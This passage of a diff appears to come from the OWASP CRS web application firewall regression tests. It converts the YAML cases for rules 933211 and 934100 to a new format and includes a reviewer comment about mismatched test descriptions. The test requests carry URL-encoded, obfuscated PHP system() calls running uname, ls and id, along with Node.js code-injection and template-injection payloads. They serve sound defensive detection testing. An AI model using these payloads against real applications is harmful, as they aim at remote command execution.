"/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-7 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 
'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id 
"933211" - - test_title: 933211-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + 
output: + log: + expect_ids: [933211] + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933211] + - test_id: 19 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 20 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] + - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=(sy.(st).em)(%40id)" - version: "HTTP/1.1" - output: - log_contains: id "933211" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=(sy.(st).em)(%40id)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933211] 
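Review bot: With `test_title` removed in favour of a bare numeric `test_id`, `desc` becomes the only human-readable label on each case, and several descs in this file do not match the payload they label: test 5 is described as `(string)'system'('uname')` and test 6 as `( string ) 'sys'.'t'.'em' ('uname')`, yet both URIs send double-quoted strings (`%22system%22` and `%22sys%22.%22t%22.%22em%22`), so a reader triaging a failure from the desc alone would be testing the wrong bypass variant. Tests 17 and 18 also carry the identical `desc: Check FP if Cookie contains '/' (slash)` although their cookies differ (`x=(foo)/(bar)` versus `x=(/foo)/(/bar)`), which makes them indistinguishable in go-ftw output. These `desc` lines are unchanged context in the hunk, so the mismatch appears to predate this commit, but the migration is the natural place to fix it; suggested wording: `desc: Check FP if Cookie contains '/' (slash) between parenthesised values` for test 17 and `desc: Check FP if Cookie contains '/' (slash) inside the parentheses` for test 18, and rewriting the descs of tests 5 and 6 to show the double-quoted form the URI actually sends.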
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
index a38f9a38b..4dfd1dc63 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
@@ -1,419 +1,416 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - enabled: true - name: "934100.yaml" - description: "Tests for rule 934100" +rule_id: 934100 tests: - - test_title: 934100-1 + - test_id: 1 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=_%24%24ND_FUNC%24%24_" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=_%24%24ND_FUNC%24%24_" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 2 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=__js_function" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=__js_function" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 3 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=eval%28String.fromCharCode" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=eval%28String.fromCharCode" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 4 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=function%28%29+%7B" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=function%28%29+%7B" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 5 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=new+Function+%28" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=new+Function+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 6 desc: imported test stages: - - stage: 
- input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=this.constructor.constructor" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=this.constructor.constructor" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 7 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=module.exports%3D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=module.exports%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 8 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 9 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 10 desc: process.env test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process.env" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process.env" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 11 desc: console.info test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: 
localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info(1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=c%5Cu006fnsole.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=c%5Cu006fnsole.info(1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 13 desc: process.env test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=process["env"]' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
'/get?foo=process["env"]' + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 14 desc: console.info test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=console["info"](1)' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=console["info"](1)' + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 15 desc: console.info test (call method) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info.call(this,1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info.call(this,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 16 desc: '"process" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process." 
- version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process." + version: HTTP/1.0 + output: + log: + no_expect_ids: [934100] + - test_id: 17 desc: '"console" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console." 
+ version: HTTP/1.0 + output: + log: + no_expect_ids: [934100] + - test_id: 18 desc: ssti test 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" + version: HTTP/1.0 + output: + log: + expect_ids: [934100] + - test_id: 19 desc: ssti test 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 